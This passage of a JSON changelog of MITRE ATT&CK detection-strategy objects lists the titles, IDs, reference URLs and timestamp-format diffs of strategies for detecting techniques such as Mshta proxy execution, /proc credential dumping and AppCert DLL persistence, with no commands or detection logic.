+                            "url": "https://attack.mitre.org/detectionstrategies/DET0506",
+                            "external_id": "DET0506"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e6037bea-ba25-40bf-b681-361d4f901adb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dc017318-98a3-450b-b903-fe1e7d988197",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0593",
+                            "external_id": "DET0593"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting OS Credential Dumping via /proc Filesystem Access on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--98b71f96-ae0a-47b4-bec2-156cb6e5bfcb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9407410b-7f35-4d32-be3c-e48ea36573d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0486",
+                            "external_id": "DET0486"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Odbcconf Proxy Execution of Malicious DLLs",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6c0a2e08-debd-46e6-bb5f-5159ad8f12ad"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ba3578d1-5913-4ed1-ab83-473a39b63f7d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0440",
+                            "external_id": "DET0440"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a59042de-ecac-45bf-a852-af3df41b86d8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--776a998c-481d-4193-934e-c0af3968c392",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0470",
+                            "external_id": "DET0470"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Protocol or Service Impersonation via Anomalous TLS, HTTP Header, and Port Mismatch Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bcf48294-2388-4ae6-be22-f9038c54e1db",
+                        "x-mitre-analytic--d27a6df2-b2df-443e-8e01-c90243465ceb",
+                        "x-mitre-analytic--a4119120-396e-4993-8f9d-bc7b5fc94e7e",
+                        "x-mitre-analytic--8307d1d4-4f50-481b-9126-3b145fd68a73"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4e2e06c5-a7bd-40d9-af9b-99fdfe725360",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0528",
+                            "external_id": "DET0528"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Remote Script Proxy Execution via PubPrn.vbs",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e7444be7-3c0a-4ff2-927d-f623af05936d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0aa86929-f232-4fa7-bdc9-120f917a3509",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0235",
+                            "external_id": "DET0235"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Steganographic Command and Control via File + Network Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e7be37f1-88f9-45e3-91d0-1ff37bc94892",
+                        "x-mitre-analytic--191d5ea7-ff08-4433-ba1b-1c0ed755ca67",
+                        "x-mitre-analytic--eb6edb6d-9684-4ef7-96b2-13c087276d80",
+                        "x-mitre-analytic--80caf81c-0714-4fa5-8b77-8e2144e316b9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--34fb7d2b-f5be-45a2-9cdc-811ae843e379",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0550",
+                            "external_id": "DET0550"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Suspicious Access to CRM Data in SaaS Environments",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--616bc2d5-5c4d-4efa-9490-c77213be1de1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c69d915c-0cbf-479e-b0b5-bebd7eb7e728",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0567",
+                            "external_id": "DET0567"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Unauthorized Collection from Messaging Applications in SaaS and Office Environments",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--222cf26f-e5cc-4b60-a7b2-39118b5c20d6",
+                        "x-mitre-analytic--0c833a56-ca8e-41d8-b79a-3f3c89c63a48"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--452c12a6-e74d-4244-a298-e9adaaf23794",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0541",
+                            "external_id": "DET0541"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for /proc Memory Injection on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3a57e109-235d-497a-9c90-952ab8b749b6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9646aa18-4ebf-43c8-bf4c-670063bc5ef8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0345",
+                            "external_id": "DET0345"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Abuse Elevation Control Mechanism (T1548)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--11f18771-dd49-45f7-8ef5-05d3426d82d5",
+                        "x-mitre-analytic--90a8d89c-f54a-49dd-8734-6f85e5e3a2a5",
+                        "x-mitre-analytic--d8b422b3-50e7-48cc-bfa1-a6e0cecf5761",
+                        "x-mitre-analytic--6385ccc0-f1a9-4198-997e-dec943e88db7",
+                        "x-mitre-analytic--9465ea54-a81a-4d00-a75d-e0b7f3392bb8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--05cb564b-df98-44d8-8982-176136eef26d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0033",
+                            "external_id": "DET0033"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Accessibility Feature Hijacking via Binary Replacement or Registry Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6b5b9cd2-f6ba-4ed5-bea2-30edbf85501e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--679edb0f-4fa0-4929-9ffd-881d9f82263d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0373",
+                            "external_id": "DET0373"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Addition of Email Delegate Permissions",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--25bd8222-a9c0-4771-8250-7d6ce7b2d176",
+                        "x-mitre-analytic--42d5a9d5-f897-4c45-b577-9b2c776c6c0d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cd0c92f4-2345-40ae-aa73-ccc1eb78eb14",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0531",
+                            "external_id": "DET0531"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Additional Cloud Credentials in IaaS/IdP/SaaS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e95d8309-8435-4c32-9ac3-38e350c170c5",
+                        "x-mitre-analytic--b31afcb5-1690-43f1-acbb-3e2936e48616",
+                        "x-mitre-analytic--7a9088cb-cfe8-4a4a-979c-1ef7678179f2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3de93376-739e-4842-875d-d6e9948db8d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0362",
+                            "external_id": "DET0362"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for AppCert DLLs Persistence via Registry Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--abe61118-51b2-45ad-93bc-9215dad25b25"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--22fe898e-3b53-468c-b2b2-dd59abc83297",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0017",
+                            "external_id": "DET0017"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Application Shimming via sdbinst.exe and Registry Artifacts (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8fcdd234-c8d8-4d95-b381-91c92cb319b6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a948dd3c-a8f3-4bc0-aec3-4c5264e7a012",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0332",
+                            "external_id": "DET0332"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for AutoHotKey & AutoIT Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7975ae39-8c6b-45cc-9280-98e94b666c85"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b79f47ca-4c42-4658-ba71-a6374778eb98",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0428",
+                            "external_id": "DET0428"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Bind Mounts on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d5c81e57-37c4-4393-a202-0955af560983"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
